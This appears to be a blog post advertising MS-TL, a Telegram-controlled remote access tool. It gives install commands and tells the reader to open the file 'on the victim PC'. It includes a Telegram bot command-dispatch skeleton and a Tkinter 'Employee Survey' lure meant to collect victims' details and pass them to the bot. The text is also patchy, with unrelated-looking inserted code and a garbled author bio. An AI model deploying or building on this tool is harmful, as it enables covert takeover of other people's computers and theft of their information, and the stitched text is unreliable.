Meta Sploit Telegram (MS-TL): Unleashing Remote Control Capabilities Through Telegram

Explore the cutting-edge capabilities of Meta Sploit Telegram (MS-TL), a powerful Telegram bot designed for remote PC control.

This article guides you through the installation process and demonstrates how to effectively commandeer computers via simple Telegram commands.

Unlock the potential of MS-TL and transform your approach to remote system management.

Installing

First, you should install the Its_Hub library.

git clone https://github.com/Unknow-per/MS-TL/
cd MS-TL
pip install -r requirements.txt
python setup.py

How To Use

After setup.py completes:

Start the MS-TL bot in Telegram (@msftlbot).

Open the file on the victim PC, then switch to Telegram.

Now you can send commands; use /help to list them.
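The bot-driven workflow above can be sketched with the raw Telegram Bot API. This is a minimal illustration, not MS-TL's actual code: the command table, dispatch helper, and poll_once function are invented for this sketch, and a real run needs a bot token issued by @BotFather.

```python
import json
import urllib.parse
import urllib.request

# Hypothetical command table -- the real MS-TL command set is listed by /help in the bot.
COMMANDS = {
    "/help": "Available commands: /help, /sysinfo",
    "/sysinfo": "Reports basic information about the controlled PC",
}

def dispatch(text: str) -> str:
    """Map an incoming Telegram message to a reply string."""
    return COMMANDS.get(text.strip(), "Unknown command - send /help")

def poll_once(token: str, offset: int = 0) -> None:
    """Fetch pending updates from the Telegram Bot API and answer each one."""
    api = f"https://api.telegram.org/bot{token}"
    with urllib.request.urlopen(f"{api}/getUpdates?offset={offset}", timeout=10) as resp:
        updates = json.load(resp)
    for update in updates.get("result", []):
        msg = update.get("message", {})
        data = urllib.parse.urlencode({
            "chat_id": msg.get("chat", {}).get("id"),
            "text": dispatch(msg.get("text", "")),
        }).encode()
        urllib.request.urlopen(f"{api}/sendMessage", data=data, timeout=10)
```

Long polling with getUpdates keeps the sketch dependency-free; a production bot would more likely use a webhook or a framework such as python-telegram-bot.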

Standard TK Payloads (10)

builder/tk_payloads/survey.py
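The tk_payloads path suggests Tkinter-based lure windows. As a hedged illustration only (the real survey.py is not shown here; QUESTIONS, pack_answers, and run_survey are invented names), a "survey" style payload might be structured like this:

```python
import json

# Illustrative form fields only; a real lure would be tailored to the target.
QUESTIONS = ["Name", "Department", "Employee ID"]

def pack_answers(answers: dict) -> str:
    """Serialize the collected answers as JSON for transport back over the bot."""
    return json.dumps(answers, sort_keys=True)

def run_survey() -> None:
    """Show a plain Tkinter form that poses as a harmless survey."""
    import tkinter as tk  # imported lazily so pack_answers stays testable without a display

    root = tk.Tk()
    root.title("Employee Survey")
    entries = {}
    for row, question in enumerate(QUESTIONS):
        tk.Label(root, text=question).grid(row=row, column=0, sticky="w")
        entry = tk.Entry(root)
        entry.grid(row=row, column=1)
        entries[question] = entry

    def submit():
        answers = {q: e.get() for q, e in entries.items()}
        print(pack_answers(answers))  # a real payload would hand this to the Telegram bot
        root.destroy()

    tk.Button(root, text="Submit", command=submit).grid(row=len(QUESTIONS), column=1)
    root.mainloop()
```

Splitting the GUI from the data-packing helper keeps the serialization logic usable by any of the other payload builders.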

For more information, see the MS-TL GitHub repository.

Varshini

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects, and is currently involved in researching and publishing security tools with Kali Linux Tutorials.
